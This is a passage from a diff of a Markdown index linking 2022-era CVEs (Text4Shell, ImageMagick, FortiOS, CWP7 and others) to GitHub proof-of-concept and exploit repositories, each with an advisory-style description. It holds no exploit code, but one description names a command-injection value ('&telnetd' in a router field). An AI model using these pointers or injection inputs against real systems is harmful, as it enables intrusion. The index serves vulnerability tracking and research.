Panini Everest Engine 2.0.4 allows unprivileged users to create a file named Everest.exe in the %PROGRAMDATA%\Panini folder. This leads to privilege escalation because a service, running as SYSTEM, uses the unquoted path of %PROGRAMDATA%\Panini\Everest Engine\EverestEngine.exe and therefore a Trojan horse %PROGRAMDATA%\Panini\Everest.exe may be executed instead of the intended vendor-supplied EverestEngine.exe file.
@@ -4667,6 +14325,13 @@
- [h4md153v63n/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated](https://github.com/h4md153v63n/CVE-2022-40348_Intern-Record-System-Cross-site-Scripting-V1.0-Vulnerability-Unauthenticated)
+### CVE-2022-40363 (2022-09-29)
+
+A buffer overflow in the component nfc_device_load_mifare_ul_data of Flipper Devices Inc., Flipper Zero before v0.65.2 allows attackers to cause a Denial of Service (DoS) via a crafted NFC file.
+
+
+- [Olafdaf/CVE-2022-40363](https://github.com/Olafdaf/CVE-2022-40363)
+
### CVE-2022-40470 (2022-11-21)
Phpgurukul Blood Donor Management System 1.0 allows Cross Site Scripting via Add Blood Group Name Feature.
@@ -4737,6 +14402,8 @@
- [TaroballzChen/CVE-2022-40684-metasploit-scanner](https://github.com/TaroballzChen/CVE-2022-40684-metasploit-scanner)
- [gustavorobertux/gotigate](https://github.com/gustavorobertux/gotigate)
- [hughink/CVE-2022-40684](https://github.com/hughink/CVE-2022-40684)
+- [notareaperbutDR34P3r/CVE-2022-40684-Rust](https://github.com/notareaperbutDR34P3r/CVE-2022-40684-Rust)
+- [z-bool/CVE-2022-40684](https://github.com/z-bool/CVE-2022-40684)
- [Anthony1500/CVE-2022-40684](https://github.com/Anthony1500/CVE-2022-40684)
### CVE-2022-40687 (2022-10-28)
@@ -4746,6 +14413,27 @@
- [williamkhepri/CVE-2022-40687-metasploit-scanner](https://github.com/williamkhepri/CVE-2022-40687-metasploit-scanner)
+### CVE-2022-40769 (2022-09-18)
+
+profanity through 1.60 has only four billion possible RNG initializations. Thus, attackers can recover private keys from Ethereum vanity addresses and steal cryptocurrency, as exploited in the wild in June 2022.
+
+
+- [PLSRcoin/CVE-2022-40769](https://github.com/PLSRcoin/CVE-2022-40769)
+
+### CVE-2022-40799 (2022-11-29)
+
+Data Integrity Failure in 'Backup Config' in D-Link DNR-322L <= 2.60B15 allows an authenticated attacker to execute OS level commands on the device.
+
+
+- [rtfmkiesel/CVE-2022-40799](https://github.com/rtfmkiesel/CVE-2022-40799)
+
+### CVE-2022-40881 (2022-11-17)
+
+SolarView Compact 6.00 was discovered to contain a command injection vulnerability via network_test.php
+
+
+- [yilin1203/CVE-2022-40881](https://github.com/yilin1203/CVE-2022-40881)
+
### CVE-2022-40916
- [whitej3rry/CVE-2022-40916](https://github.com/whitej3rry/CVE-2022-40916)
@@ -4756,6 +14444,13 @@
- [ethomson/cve-2022-41032](https://github.com/ethomson/cve-2022-41032)
+### CVE-2022-41034 (2022-10-11)
+
+Visual Studio Code Remote Code Execution Vulnerability
+
+
+- [andyhsu024/CVE-2022-41034](https://github.com/andyhsu024/CVE-2022-41034)
+
### CVE-2022-41040 (2022-10-03)
Microsoft Exchange Server Elevation of Privilege Vulnerability
@@ -4777,6 +14472,13 @@
- [Nathan01110011/CVE-2022-41049-POC](https://github.com/Nathan01110011/CVE-2022-41049-POC)
+### CVE-2022-41076 (2022-12-13)
+
+PowerShell Remote Code Execution Vulnerability
+
+
+- [5l1v3r1/CVE-2022-41076](https://github.com/5l1v3r1/CVE-2022-41076)
+
### CVE-2022-41080 (2022-11-09)
Microsoft Exchange Server Elevation of Privilege Vulnerability
@@ -4793,8 +14495,27 @@
- [notareaperbutDR34P3r/http-vuln-CVE-2022-41082](https://github.com/notareaperbutDR34P3r/http-vuln-CVE-2022-41082)
- [sikkertech/CVE-2022-41082](https://github.com/sikkertech/CVE-2022-41082)
- [balki97/OWASSRF-CVE-2022-41082-POC](https://github.com/balki97/OWASSRF-CVE-2022-41082-POC)
+- [bigherocenter/CVE-2022-41082-POC](https://github.com/bigherocenter/CVE-2022-41082-POC)
+- [notareaperbutDR34P3r/vuln-CVE-2022-41082](https://github.com/notareaperbutDR34P3r/vuln-CVE-2022-41082)
- [SUPRAAA-1337/CVE-2022-41082](https://github.com/SUPRAAA-1337/CVE-2022-41082)
+### CVE-2022-41099 (2022-11-09)
+
+BitLocker Security Feature Bypass Vulnerability
+
+
+- [halsey51013/UpdateWindowsRE-CVE-2022-41099](https://github.com/halsey51013/UpdateWindowsRE-CVE-2022-41099)
+- [o0MattE0o/CVE-2022-41099-Fix](https://github.com/o0MattE0o/CVE-2022-41099-Fix)
+- [g-gill24/WinRE-Patch](https://github.com/g-gill24/WinRE-Patch)
+- [dsn1321/KB5025175-CVE-2022-41099](https://github.com/dsn1321/KB5025175-CVE-2022-41099)
+
+### CVE-2022-41114 (2022-11-09)
+
+Windows Bind Filter Driver Elevation of Privilege Vulnerability
+
+
+- [gmh5225/CVE-2022-41114](https://github.com/gmh5225/CVE-2022-41114)
+
### CVE-2022-41218 (2022-09-21)
In drivers/media/dvb-core/dmxdev.c in the Linux kernel through 5.19.10, there is a use-after-free caused by refcount races, affecting dvb_demux_open and dvb_dmxdev_release.
@@ -4816,6 +14537,20 @@
- [redrays-io/CVE-2022-41272](https://github.com/redrays-io/CVE-2022-41272)
+### CVE-2022-41333 (2023-03-07)
+
+An uncontrolled resource consumption vulnerability [CWE-400] in FortiRecorder version 6.4.3 and below, 6.0.11 and below login authentication mechanism may allow an unauthenticated attacker to make the device unavailable via crafted GET requests.
+
+
+- [polar0x/CVE-2022-41333](https://github.com/polar0x/CVE-2022-41333)
+
+### CVE-2022-41343 (2022-09-25)
+
+registerFont in FontMetrics.php in Dompdf before 2.0.1 allows remote file inclusion because a URI validation failure does not halt font registration, as demonstrated by a @font-face rule.
+
+
+- [BKreisel/CVE-2022-41343](https://github.com/BKreisel/CVE-2022-41343)
+
### CVE-2022-41352 (2022-09-26)
An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.
@@ -4823,6 +14558,7 @@
- [segfault-it/cve-2022-41352](https://github.com/segfault-it/cve-2022-41352)
- [Cr4ckC4t/cve-2022-41352-zimbra-rce](https://github.com/Cr4ckC4t/cve-2022-41352-zimbra-rce)
+- [lolminerxmrig/cve-2022-41352-zimbra-rce-1](https://github.com/lolminerxmrig/cve-2022-41352-zimbra-rce-1)
- [qailanet/cve-2022-41352-zimbra-rce](https://github.com/qailanet/cve-2022-41352-zimbra-rce)
### CVE-2022-41358 (2022-10-20)
@@ -4874,6 +14610,13 @@
- [efchatz/easy-exploits](https://github.com/efchatz/easy-exploits)
+### CVE-2022-41544 (2022-10-18)
+
+GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php.
+
+
+- [yosef0x01/CVE-2022-41544](https://github.com/yosef0x01/CVE-2022-41544)
+
### CVE-2022-41622 (2022-12-07)
In all versions, \n\nBIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. \n\nNote: Software versions which have reached End of Technical Support (EoTS) are not evaluated.\n\n
@@ -4912,6 +14655,20 @@
- [mbadanoiu/CVE-2022-41853](https://github.com/mbadanoiu/CVE-2022-41853)
+### CVE-2022-41876 (2022-11-10)
+
+ezplatform-graphql is a GraphQL server implementation for Ibexa DXP and Ibexa Open Source. Versions prior to 2.3.12 and 1.0.13 are subject to Insecure Storage of Sensitive Information. Unauthenticated GraphQL queries for user accounts can expose password hashes of users that have created or modified content, typically administrators and editors. This issue has been patched in versions 2.3.12, and 1.0.13 on the 1.X branch. Users unable to upgrade can remove the "passwordHash" entry from "src/bundle/Resources/config/graphql/User.types.yaml" in the GraphQL package, and other properties like hash type, email, login if you prefer.
+
+
+- [Skileau/CVE-2022-41876](https://github.com/Skileau/CVE-2022-41876)
+
+### CVE-2022-41903 (2023-01-17)
+
+Git is distributed revision control system. `git log` can display commits in an arbitrary format using its `--format` specifiers. This functionality is also exposed to `git archive` via the `export-subst` gitattribute. When processing the padding operators, there is a integer overflow in `pretty.c::format_and_pad_commit()` where a `size_t` is stored improperly as an `int`, and then added as an offset to a `memcpy()`. This overflow can be triggered directly by a user running a command which invokes the commit formatting machinery (e.g., `git log --format=...`). It may also be triggered indirectly through git archive via the export-subst mechanism, which expands format specifiers inside of files within the repository during a git archive. This integer overflow can result in arbitrary heap writes, which may result in arbitrary code execution. The problem has been patched in the versions published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade. Users who are unable to upgrade should disable `git archive` in untrusted repositories. If you expose git archive via `git daemon`, disable it by running `git config --global daemon.uploadArch false`.
+
+
+- [sondermc/git-cveissues](https://github.com/sondermc/git-cveissues)
+
### CVE-2022-41923 (2022-11-23)
Grails Spring Security Core plugin is vulnerable to privilege escalation. The vulnerability allows an attacker access to one endpoint (i.e. the targeted endpoint) using the authorization requirements of a different endpoint (i.e. the donor endpoint). In some Grails framework applications, access to the targeted endpoint will be granted based on meeting the authorization requirements of the donor endpoint, which can result in a privilege escalation attack. This vulnerability has been patched in grails-spring-security-core versions 3.3.2, 4.0.5 and 5.1.1. Impacted Applications: Grails Spring Security Core plugin versions: 1.x 2.x >=3.0.0 <3.3.2 >=4.0.0 <4.0.5 >=5.0.0 <5.1.1 We strongly suggest that all Grails framework applications using the Grails Spring Security Core plugin be updated to a patched release of the plugin. Workarounds: Users should create a subclass extending one of the following classes from the `grails.plugin.springsecurity.web.access.intercept` package, depending on their security configuration: * `AnnotationFilterInvocationDefinition` * `InterceptUrlMapFilterInvocationDefinition` * `RequestmapFilterInvocationDefinition` In each case, the subclass should override the `calculateUri` method like so: ``` @Override protected String calculateUri(HttpServletRequest request) { UrlPathHelper.defaultInstance.getRequestUri(request) } ``` This should be considered a temporary measure, as the patched versions of grails-spring-security-core deprecates the `calculateUri` method. Once upgraded to a patched version of the plugin, this workaround is no longer needed. The workaround is especially important for version 2.x, as no patch is available version 2.x of the GSSC plugin.
@@ -4919,6 +14676,13 @@
- [grails/GSSC-CVE-2022-41923](https://github.com/grails/GSSC-CVE-2022-41923)
+### CVE-2022-41966 (2022-12-27)
+
+XStream serializes Java objects to XML and back again. Versions prior to 1.4.20 may allow a remote attacker to terminate the application with a stack overflow error, resulting in a denial of service only via manipulation the processed input stream. The attack uses the hash code implementation for collections and maps to force recursive hash calculation causing a stack overflow. This issue is patched in version 1.4.20 which handles the stack overflow and raises an InputManipulationException instead. A potential workaround for users who only use HashMap or HashSet and whose XML refers these only as default map or set, is to change the default implementation of java.util.Map and java.util per the code example in the referenced advisory. However, this implies that your application does not care about the implementation of the map and all elements are comparable.
+
+
+- [111ddea/Xstream_cve-2022-41966](https://github.com/111ddea/Xstream_cve-2022-41966)
+
### CVE-2022-42045 (2023-07-13)
Certain Zemana products are vulnerable to Arbitrary code injection. This affects Watchdog Anti-Malware 4.1.422 and Zemana AntiMalware 3.2.28.
@@ -4975,13 +14739,34 @@
- [soy-oreocato/CVE-2022-42176](https://github.com/soy-oreocato/CVE-2022-42176)
+### CVE-2022-42475 (2023-01-02)
+
+A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.
+
+
+- [bryanster/ioc-cve-2022-42475](https://github.com/bryanster/ioc-cve-2022-42475)
+- [scrt/cve-2022-42475](https://github.com/scrt/cve-2022-42475)
+- [Amir-hy/cve-2022-42475](https://github.com/Amir-hy/cve-2022-42475)
+- [Mustafa1986/cve-2022-42475-Fortinet](https://github.com/Mustafa1986/cve-2022-42475-Fortinet)
+- [3yujw7njai/CVE-2022-42475-RCE-POC](https://github.com/3yujw7njai/CVE-2022-42475-RCE-POC)
+- [natceil/cve-2022-42475](https://github.com/natceil/cve-2022-42475)
+- [0xhaggis/CVE-2022-42475](https://github.com/0xhaggis/CVE-2022-42475)
+
### CVE-2022-42703 (2022-10-09)
mm/rmap.c in the Linux kernel before 5.19.7 has a use-after-free related to leaf anon_vma double reuse.
+- [Squirre17/hbp-attack-demo](https://github.com/Squirre17/hbp-attack-demo)
- [Satheesh575555/linux-4.1.15_CVE-2022-42703](https://github.com/Satheesh575555/linux-4.1.15_CVE-2022-42703)
+### CVE-2022-42864 (2022-12-15)
+
+A race condition was addressed with improved state handling. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges.
+
+
+- [Muirey03/CVE-2022-42864](https://github.com/Muirey03/CVE-2022-42864)
+
### CVE-2022-42889 (2022-10-13)
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
@@ -5020,14 +14805,32 @@
- [gokul-ramesh/text4shell-exploit](https://github.com/gokul-ramesh/text4shell-exploit)
- [f0ng/text4shellburpscanner](https://github.com/f0ng/text4shellburpscanner)
- [WFS-Mend/vtrade-common](https://github.com/WFS-Mend/vtrade-common)
+- [devenes/text4shell-cve-2022-42889](https://github.com/devenes/text4shell-cve-2022-42889)
+- [hotblac/text4shell](https://github.com/hotblac/text4shell)
+- [necroteddy/CVE-2022-42889](https://github.com/necroteddy/CVE-2022-42889)
+- [ReachabilityOrg/cve-2022-42889-text4shell-docker](https://github.com/ReachabilityOrg/cve-2022-42889-text4shell-docker)
+- [dgor2023/cve-2022-42889-text4shell-docker](https://github.com/dgor2023/cve-2022-42889-text4shell-docker)
+- [Dima2021/cve-2022-42889-text4shell](https://github.com/Dima2021/cve-2022-42889-text4shell)
- [RSA-Demo/cve-2022-42889-text4shell](https://github.com/RSA-Demo/cve-2022-42889-text4shell)
- [aaronm-sysdig/text4shell-docker](https://github.com/aaronm-sysdig/text4shell-docker)
+- [gustanini/CVE-2022-42889-Text4Shell-POC](https://github.com/gustanini/CVE-2022-42889-Text4Shell-POC)
- [Sic4rio/CVE-2022-42889](https://github.com/Sic4rio/CVE-2022-42889)
- [34006133/CVE-2022-42889](https://github.com/34006133/CVE-2022-42889)
- [DimaMend/cve-2022-42889-text4shell](https://github.com/DimaMend/cve-2022-42889-text4shell)
- [joshbnewton31080/cve-2022-42889-text4shell](https://github.com/joshbnewton31080/cve-2022-42889-text4shell)
- [MendDemo-josh/cve-2022-42889-text4shell](https://github.com/MendDemo-josh/cve-2022-42889-text4shell)
+### CVE-2022-42896 (2022-11-23)
+
+There are use-after-free vulnerabilities in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth. A remote attacker could execute code leaking kernel memory via Bluetooth if within proximity of the victim.\n\nWe recommend upgrading past commit https://www.google.com/url https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4 https://www.google.com/url \n\n
+
+
+- [Satheesh575555/linux-4.19.72_CVE-2022-42896](https://github.com/Satheesh575555/linux-4.19.72_CVE-2022-42896)
+- [hshivhare67/kernel_v4.19.72_CVE-2022-42896_old](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-42896_old)
+- [Trinadh465/linux-4.19.72_CVE-2022-42896](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-42896)
+- [hshivhare67/kernel_v4.19.72_CVE-2022-42896_new](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-42896_new)
+- [himanshu667/kernel_v4.19.72_CVE-2022-42896](https://github.com/himanshu667/kernel_v4.19.72_CVE-2022-42896)
+
### CVE-2022-42899 (2022-10-13)
Bentley MicroStation and MicroStation-based applications may be affected by out-of-bounds read and stack overflow issues when opening crafted SKP files. Exploiting these issues could lead to information disclosure and code execution. The fixed versions are 10.17.01.58* for MicroStation and 10.17.01.19* for Bentley View.
@@ -5077,6 +14880,13 @@
- [SecurityWillCheck/CVE-2022-43271](https://github.com/SecurityWillCheck/CVE-2022-43271)
+### CVE-2022-43293 (2023-04-11)
+
+Wacom Driver 6.3.46-1 for Windows was discovered to contain an arbitrary file write vulnerability via the component \Wacom\Wacom_Tablet.exe.
+
+
+- [LucaBarile/CVE-2022-43293](https://github.com/LucaBarile/CVE-2022-43293)
+
### CVE-2022-43332 (2022-11-17)
A cross-site scripting (XSS) vulnerability in Wondercms v3.3.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Site title field of the Configuration Panel.
@@ -5084,6 +14894,13 @@
- [maikroservice/CVE-2022-43332](https://github.com/maikroservice/CVE-2022-43332)
+### CVE-2022-43343 (2022-11-08)
+
+N-Prolog v1.91 was discovered to contain a global buffer overflow vulnerability in the function gettoken() at Main.c.
+
+
+- [Halcy0nic/CVE-2022-43343](https://github.com/Halcy0nic/CVE-2022-43343)
+
### CVE-2022-43369 (2022-12-06)
AutoTaxi Stand Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component search.php.
@@ -5127,6 +14944,34 @@
- [secware-ru/CVE-2022-43959](https://github.com/secware-ru/CVE-2022-43959)
+### CVE-2022-43980 (2023-01-27)
+
+There is a stored cross-site scripting vulnerability in Pandora FMS v765 in the network maps editing functionality. An attacker could modify a network map, including on purpose the name of an XSS payload. Once created, if a user with admin privileges clicks on the edited network maps, the XSS payload will be executed. The exploitation of this vulnerability could allow an atacker to steal the value of the admin user´s cookie.
+
+
+- [Argonx21/CVE-2022-43980](https://github.com/Argonx21/CVE-2022-43980)
+
+### CVE-2022-44118 (2022-11-23)
+
+dedecmdv6 v6.1.9 is vulnerable to Remote Code Execution (RCE) via file_manage_control.php.
+
+
+- [Athishpranav2003/CVE-2022-44118-Exploit](https://github.com/Athishpranav2003/CVE-2022-44118-Exploit)
+
+### CVE-2022-44136 (2022-11-30)
+
+Zenario CMS 9.3.57186 is vulnerable to Remote Code Excution (RCE).
+
+
+- [IgorDuino/CVE-2022-44136-exploit](https://github.com/IgorDuino/CVE-2022-44136-exploit)
+
+### CVE-2022-44149 (2023-01-06)
+
+The web service on Nexxt Amp300 ARN02304U8 42.103.1.5095 and 80.103.2.5045 devices allows remote OS command execution by placing &telnetd in the JSON host field to the ping feature of the goform/sysTools component. Authentication is required
+
+
+- [yerodin/CVE-2022-44149](https://github.com/yerodin/CVE-2022-44149)
+
### CVE-2022-44183 (2022-11-21)
Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic.
@@ -5146,9 +14991,21 @@
ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary. file (if the magick binary has permissions to read it).
+- [duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC](https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC)
+- [y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment](https://github.com/y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment)
+- [agathanon/cve-2022-44268](https://github.com/agathanon/cve-2022-44268)
- [jnschaeffer/cve-2022-44268-detector](https://github.com/jnschaeffer/cve-2022-44268-detector)
+- [Ashifcoder/CVE-2022-44268-automated-poc](https://github.com/Ashifcoder/CVE-2022-44268-automated-poc)
+- [Baikuya/CVE-2022-44268-PoC](https://github.com/Baikuya/CVE-2022-44268-PoC)
+- [voidz0r/CVE-2022-44268](https://github.com/voidz0r/CVE-2022-44268)
- [Sybil-Scan/imagemagick-lfi-poc](https://github.com/Sybil-Scan/imagemagick-lfi-poc)
+- [Vulnmachines/imagemagick-CVE-2022-44268](https://github.com/Vulnmachines/imagemagick-CVE-2022-44268)
- [kljunowsky/CVE-2022-44268](https://github.com/kljunowsky/CVE-2022-44268)
+- [nfm/heroku-CVE-2022-44268-reproduction](https://github.com/nfm/heroku-CVE-2022-44268-reproduction)
+- [betillogalvanfbc/POC-CVE-2022-44268](https://github.com/betillogalvanfbc/POC-CVE-2022-44268)
+- [adhikara13/CVE-2022-44268-MagiLeak](https://github.com/adhikara13/CVE-2022-44268-MagiLeak)
+- [bhavikmalhotra/CVE-2022-44268-Exploit](https://github.com/bhavikmalhotra/CVE-2022-44268-Exploit)
+- [entr0pie/CVE-2022-44268](https://github.com/entr0pie/CVE-2022-44268)
- [Pog-Frog/cve-2022-44268](https://github.com/Pog-Frog/cve-2022-44268)
- [narekkay/auto-cve-2022-44268.sh](https://github.com/narekkay/auto-cve-2022-44268.sh)
- [fanbyprinciple/ImageMagick-lfi-poc](https://github.com/fanbyprinciple/ImageMagick-lfi-poc)
@@ -5158,6 +15015,21 @@
- [NataliSemi/-CVE-2022-44268](https://github.com/NataliSemi/-CVE-2022-44268)
- [CygnusX-26/CVE-2022-44268-fixed-PoC](https://github.com/CygnusX-26/CVE-2022-44268-fixed-PoC)
+### CVE-2022-44276 (2023-06-28)
+
+In Responsive Filemanager < 9.12.0, an attacker can bypass upload restrictions resulting in RCE.
+
+
+- [HerrLeStrate/CVE-2022-44276-PoC](https://github.com/HerrLeStrate/CVE-2022-44276-PoC)
+
+### CVE-2022-44311 (2022-11-08)
+
+html2xhtml v1.3 was discovered to contain an Out-Of-Bounds read in the function static void elm_close(tree_node_t *nodo) at procesador.c. This vulnerability allows attackers to access sensitive files or cause a Denial of Service (DoS) via a crafted html file.
+
+
+- [Halcy0nic/CVE-2022-44311](https://github.com/Halcy0nic/CVE-2022-44311)
+- [DesmondSanctity/CVE-2022-44311](https://github.com/DesmondSanctity/CVE-2022-44311)
+
### CVE-2022-44312 (2022-11-08)
PicoC Version 3.2.2 was discovered to contain a heap buffer overflow in the ExpressionCoerceInteger function in expression.c when called from ExpressionInfixOperator.
@@ -5165,6 +15037,13 @@
- [Halcy0nic/CVEs-for-picoc-3.2.2](https://github.com/Halcy0nic/CVEs-for-picoc-3.2.2)
+### CVE-2022-44318 (2022-11-08)
+
+PicoC Version 3.2.2 was discovered to contain a heap buffer overflow in the StringStrcat function in cstdlib/string.c when called from ExpressionParseFunctionCall.
+
+
+- [Halcy0nic/CVE-2022-44318](https://github.com/Halcy0nic/CVE-2022-44318)
+
### CVE-2022-44569 (2023-11-03)
A locally authenticated attacker with low privileges can bypass authentication due to insecure inter-process communication.
@@ -5172,6 +15051,13 @@
- [rweijnen/ivanti-automationmanager-exploit](https://github.com/rweijnen/ivanti-automationmanager-exploit)
+### CVE-2022-44666 (2022-12-13)
+
+Windows Contacts Remote Code Execution Vulnerability
+
+
+- [j00sean/CVE-2022-44666](https://github.com/j00sean/CVE-2022-44666)
+
### CVE-2022-44721
- [gmh5225/CVE-2022-44721-CsFalconUninstaller](https://github.com/gmh5225/CVE-2022-44721-CsFalconUninstaller)
@@ -5208,16 +15094,51 @@
login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.
+- [numanturle/CVE-2022-44877](https://github.com/numanturle/CVE-2022-44877)
+- [komomon/CVE-2022-44877-RCE](https://github.com/komomon/CVE-2022-44877-RCE)
+- [ColdFusionX/CVE-2022-44877-CWP7](https://github.com/ColdFusionX/CVE-2022-44877-CWP7)
+- [Chocapikk/CVE-2022-44877](https://github.com/Chocapikk/CVE-2022-44877)
- [hotpotcookie/CVE-2022-44877-white-box](https://github.com/hotpotcookie/CVE-2022-44877-white-box)
+- [RicYaben/CVE-2022-44877-LAB](https://github.com/RicYaben/CVE-2022-44877-LAB)
+- [dkstar11q/CVE-2022-44877](https://github.com/dkstar11q/CVE-2022-44877)
- [rhymsc/CVE-2022-44877-RCE](https://github.com/rhymsc/CVE-2022-44877-RCE)
- [G01d3nW01f/CVE-2022-44877](https://github.com/G01d3nW01f/CVE-2022-44877)
+### CVE-2022-44900 (2022-12-06)
+
+A directory traversal vulnerability in the SevenZipFile.extractall() function of the python library py7zr v0.20.0 and earlier allows attackers to write arbitrary files via extracting a crafted 7z file.
+
+
+- [0xless/CVE-2022-44900-demo-lab](https://github.com/0xless/CVE-2022-44900-demo-lab)
+
+### CVE-2022-45003 (2023-03-22)
+
+Gophish through 0.12.1 allows attackers to cause a Denial of Service (DoS) via a crafted payload involving autofocus.
+
+
+- [mha98/CVE-2022-45003](https://github.com/mha98/CVE-2022-45003)
+
+### CVE-2022-45004 (2023-03-22)
+
+Gophish through 0.12.1 was discovered to contain a cross-site scripting (XSS) vulnerability via a crafted landing page.
+
+
+- [mha98/CVE-2022-45004](https://github.com/mha98/CVE-2022-45004)
+
### CVE-2022-45025 (2022-12-07)
Markdown Preview Enhanced v0.6.5 and v0.19.6 for VSCode and Atom was discovered to contain a command injection vulnerability via the PDF file import function.
- [yuriisanin/CVE-2022-45025](https://github.com/yuriisanin/CVE-2022-45025)
+- [andyhsu024/CVE-2022-45025](https://github.com/andyhsu024/CVE-2022-45025)
+
+### CVE-2022-45047 (2022-11-16)
+
+Class org.apache.sshd.server.keyprovider.SimpleGeneratorHostKeyProvider in Apache MINA SSHD <= 2.9.1 uses Java deserialization to load a serialized java.security.PrivateKey. The class is one of several implementations that an implementor using Apache MINA SSHD can choose for loading the host keys of an SSH server.
+
+
+- [hktalent/CVE-2022-45047](https://github.com/hktalent/CVE-2022-45047)
### CVE-2022-45059 (2022-11-09)
@@ -5236,6 +15157,13 @@
### CVE-2022-45265
- [maikroservice/CVE-2022-45265](https://github.com/maikroservice/CVE-2022-45265)
+### CVE-2022-45299 (2023-01-13)
+
+An issue in the IpFile argument of rust-lang webbrowser-rs v0.8.2 allows attackers to access arbitrary files via supplying a crafted URL.
+
+
+- [offalltn/CVE-2022-45299](https://github.com/offalltn/CVE-2022-45299)
+
### CVE-2022-45354 (2024-01-08)
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in WPChill Download Monitor.This issue affects Download Monitor: from n/a through 4.7.60.\n\n
@@ -5243,6 +15171,13 @@
- [RandomRobbieBF/CVE-2022-45354](https://github.com/RandomRobbieBF/CVE-2022-45354)
+### CVE-2022-45436 (2023-02-15)
+
+Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Artica PFMS Pandora FMS v765 on all platforms, allows Cross-Site Scripting (XSS). As a manager privilege user , create a network map containing name as xss payload. Once created, admin user must click on the edit network maps and XSS payload will be executed, which could be used for stealing admin users cookie value.\n\n
+
+
+- [damodarnaik/CVE-2022-45436](https://github.com/damodarnaik/CVE-2022-45436)
+
### CVE-2022-45451 (2023-08-31)
Local privilege escalation due to insecure driver communication port permissions. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40173, Acronis Agent (Windows) before build 30600, Acronis Cyber Protect 15 (Windows) before build 30984.
@@ -5271,6 +15206,27 @@
- [kinderscsaa/cve-2022-45511](https://github.com/kinderscsaa/cve-2022-45511)
+### CVE-2022-45544 (2023-02-07)
+
+Insecure Permission vulnerability in Schlix Web Inc SCHLIX CMS 2.2.7-2 allows attacker to upload arbitrary files and execute arbitrary code via the tristao parameter. NOTE: this is disputed by the vendor because an admin is intentionally allowed to upload new executable PHP code, such as a theme that was obtained from a trusted source or was developed for their own website. Only an admin can upload such code, not someone else in an "attacker" role.
+
+
+- [tristao-marinho/CVE-2022-45544](https://github.com/tristao-marinho/CVE-2022-45544)
+
+### CVE-2022-45599 (2023-02-22)
+
+Aztech WMB250AC Mesh Routers Firmware Version 016 2020 is vulnerable to PHP Type Juggling in file /var/www/login.php, allows attackers to gain escalated privileges only when specific conditions regarding a given accounts hashed password.
+
+
+- [ethancunt/CVE-2022-45599](https://github.com/ethancunt/CVE-2022-45599)
+
+### CVE-2022-45600 (2023-02-22)
+
+Aztech WMB250AC Mesh Routers Firmware Version 016 2020 devices improperly manage sessions, which allows remote attackers to bypass authentication in opportunistic circumstances and execute arbitrary commands with administrator privileges by leveraging an existing web portal login.
+
+
+- [ethancunt/CVE-2022-45600](https://github.com/ethancunt/CVE-2022-45600)
+
### CVE-2022-45688 (2022-12-13)
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.
@@ -5289,12 +15245,41 @@
- [0xst4n/APSystems-ECU-R-RCE-Timezone](https://github.com/0xst4n/APSystems-ECU-R-RCE-Timezone)
+### CVE-2022-45701 (2023-02-17)
+
+Arris TG2482A firmware through 9.1.103GEM9 allow Remote Code Execution (RCE) via the ping utility feature.
+
+
+- [yerodin/CVE-2022-45701](https://github.com/yerodin/CVE-2022-45701)
+
+### CVE-2022-45728 (2023-01-12)
+
+Doctor Appointment Management System v1.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability.
+
+
